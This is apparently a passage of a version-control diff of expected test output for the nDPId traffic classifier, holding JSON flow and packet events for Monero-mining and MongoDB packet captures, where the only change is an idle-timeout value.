00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"}
00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196188350,"flow_last_seen":1514196188350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196188350,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"}
00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"}
00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":199,"source":"monero.pcap","alias":"nDPId-test","packets-captured":199,"packets-processed":198,"total-skipped-flows":0,"total-l4-data-len":82647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1514196819733}
00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","packets-captured":319,"packets-processed":319,"total-skipped-flows":0,"total-l4-data-len":146090,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1514197279769}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 319/319

60
test/results/mongodb.pcap.out
View File

@@ -1,39 +1,39 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mongodb.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1483459978959}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483459978959,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483459978959,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"}
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483459978959,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483459978959,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"}
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1483558834969}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="}
